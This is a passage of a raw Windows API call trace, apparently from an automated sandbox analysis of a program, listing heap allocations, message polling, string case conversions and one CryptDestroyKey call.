RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0258.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0258.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0258.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0258.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0258.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.773] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0258.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.774] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.774] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0258.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.774] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0258.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0258.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0258.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0258.774] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0258.775] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0258.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.775] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0258.775] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0258.775] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0258.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.775] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0258.775] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.775] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0258.776] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0258.776] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0258.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.776] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0258.776] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.776] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0258.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.776] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.776] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0258.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0258.777] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.777] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.777] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.777] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.777] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.777] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.777] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.778] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0258.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.778] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.778] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.778] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.778] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0258.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.779] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.779] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0258.779] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.779] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0258.779] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.779] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0258.780] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.780] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0258.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0258.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.780] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.780] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0258.780] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0258.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0258.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.780] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0258.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0258.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.781] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0258.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0258.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0258.781] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0258.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0258.781] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0258.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0258.781] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0258.782] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0258.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.782] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0258.782] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.782] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0258.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0258.782] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0258.782] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0258.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.783] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0258.783] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.783] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0258.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.783] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.783] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0258.783] RtlAllocateHeap (HeapHandle=0x25c0000, 